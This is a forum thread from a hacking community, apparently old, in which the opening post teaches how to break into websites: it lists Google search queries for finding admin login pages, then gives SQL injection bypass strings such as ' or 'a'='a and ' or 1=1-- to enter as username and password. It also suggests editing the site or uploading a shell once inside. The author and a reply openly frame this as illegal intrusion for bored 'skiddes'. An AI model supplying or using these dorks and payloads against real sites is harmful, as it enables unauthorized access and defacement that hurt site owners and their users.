Skip to content
MPGHThe Dark Arts
/
RegisterLog in
Forum
Community
What's NewLatest posts across the boardTrendingHottest threads right nowSubscribedThreads you follow
Discussion
GeneralIntroductionsEntertainmentDebate FortFlaming & Rage
Board
News & AnnouncementsMPGH TimesSuggestions & HelpGiveaways
More Sections
Art & Graphic DesignProgrammingHackingCryptocurrency
Hacks & Cheats
Games
ValorantCS2 / CS:GOCall of Duty / WarzoneFortniteApex LegendsEscape From Tarkov
+14 moreLeague of LegendsGTA VMinecraftRustROTMGBattlefieldTroveBattleOnCombat ArmsCrossFireBlackshotRuneScapeDayZDead by Daylight
Resources
Game Hacking TutorialsReverse EngineeringGeneral Game HackingAnti-CheatConsole Game Hacking
Tools
Game Hacking ToolsTrainers & CheatsHack/Release NewsNew
Submit a release →Share your cheat, tool, or config with the community.
AINEW
AI Tools
General & DiscussionPrompt EngineeringLLM JailbreaksHotAI Agents & AutomationLocal / Open Models
AI × Gaming
AI Aimbots & VisionML Anti-CheatGame Bots & Automation
Create
AI Coding / Vibe CodingAI Art & MediaAI Voice & TTS
The AI frontier →Where game hacking meets modern machine learning. Jump in.
Marketplace
Buy & Sell
SellingBuyingTradingUser Services
Trust & Safety
Middleman LoungeMarketplace TalkVouch Copy Profiles
Money
Cryptocurrency TalkCurrency ExchangeWork & Job Offers
Start selling →List accounts, services, and goods. Use the middleman to trade safe.
MPGH The Dark Arts

A community for offensive security research, reverse engineering, and AI.

Community

ForumMarketplaceSearch

Account

RegisterLog in

Legal

Privacy PolicyForum RulesHelp & FAQ
© 2026 MPGH · All rights reserved.Built by the community, for the community. For educational purposes onlyContent is shared for security research and education — we don't condone illegal use. You're responsible for complying with applicable laws. Use at your own risk.
Home › Forum › Hacking › General Hacking › SIMPLE SQL Injections

SIMPLE SQL Injections

Posts 1–4 of 4 · Page 1 of 1
H3
h3lpless_alpaca
SIMPLE SQL Injections
SQL injection is a way of..basicly loggin into sites (as admin) that you are not ment to have access to

First, please look over this list of google search terms I have made. Simple search the term on google and it's possible to find vulnerable websites this way:
(WITH OR WITHOUT QUOTES. YOU MAY CHANGE .ASP to .PHP BUT .ASP TENDS TO WORK BETTER)
Also, you can add keywords at the end of each search, to narrow down your search.

inurl:"admin.asp"
inurl:"adminlogin.asp"
inurl:"login/admin.asp"
inurl:"admin/login.asp"
inurl:"webadmin.asp"
inurl:"adminpanel.asp"
inurl:"administrator.asp"
inurl:"administrator/login.asp"
inurl:"panel/login.asp"
inurl:"church/admin.asp"
inurl:"websitelogin.asp"
inurl:"edit/login.asp"
inurl:"/administration/"
inurl:"/editsite"
inurl:"staff.asp" login
inurl:"/login/staff.asp"
inurl:"memberslogin.asp"
inurl:"memberlogin.asp"
inurl:"members/login.asp"
inurl:"owner/login.asp"
inurl:"administrate/login.asp"
inurl:"controlpanel.asp"
inurl:"siteadmin.asp"
inurl:"website/login.asp"
inurl:"admin.asp" login
inurl:"admin_login.asp" login
inurl:"login" "staff login"
inurl:"login" "admin login"
inurl:"login/admin.asp"
inurl:"login.asp" "staff only"
inurl:"administration.asp" "admin login"
inurl:"adminpage.asp"
inurl:"adminlogin.asp"


FIRST STEP
After searching on google with one of the terms on the supplied list, you will want to open all the pages one a single google page in seperate tabs.
After doing that, it's time to see if the login page is vulnerable to the simplest of MySQL injections. Simply type in this string as the username and password for the login form:
' or 'a'='a
There are other strings you can try to use if the one above doesn't work:<br>

' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a

SECOND STEP
If the login works, you now h ave unauthorized access to the website. If you're lucky, you will be able to find a content management system and edit the page. If they allow you to upload pictures/files you could also try ********* a shell (explained in another tutorial).
If the login doesn't happen to work, go to the next google page or try a different search term. Please remember this is the SIMPLEST type of "hacking" on the internet, and there aren't a lot of vulnerable websites. But at times I do get surprised at the lack of security on some websites.

(To one of the admins..i hope this site doesnt have this for of login if it does please remove this post..D


YES! IT IS ILLEGAL DONT BE STUPID SKIDDES!!!

Credits to DoesNotAfraid

BTW DoesNotAfraid also told us how to do advanced SQL injection if enough ppl are interested in this then i will make a post about the Advanced version of such =3
#1 · edited 17y ago · 17y ago
MI
mikehunt..
This is too easy, you should have just posted the advanced version.
#2 · 17y ago
H3
h3lpless_alpaca
Quote Originally Posted by mikehunt View Post
This is too easy, you should have just posted the advanced version.
this is for all the skiddes that get bored and want to do some illegal shit if i get enough ppl wanting the advanced version ill make another post
#3 · 17y ago
MI
mikehunt..
Quote Originally Posted by h3lpless_alpaca View Post
this is for all the skiddes that get bored and want to do some illegal shit if i get enough ppl wanting the advanced version ill make another post
That sounds delightful.
#4 · 17y ago
Posts 1–4 of 4 · Page 1 of 1

Post a Reply

Similar Threads

  • e107 <= 0.6172 (resetcore.php) Remote SQL Injection Exploit:By RoB07 in Exploits
    4Last post 12y ago
  • KO can be sql injectedBy sf0d in General Game Hacking
    2Last post 20y ago
  • Invision Power Board <=2.3.5 Remote SQL InjectionBy Token in Exploits
    1Last post 16y ago
  • Question about SQL InjectionsBy darkounet in General Game Hacking
    0Last post 19y ago
  • JAMM CMS (id) Blind SQL Injection VulnerabilityBy Mr.Dark Shark!! in Exploits
    4Last post 18y ago

Tags for this Thread

#injections#simple#sql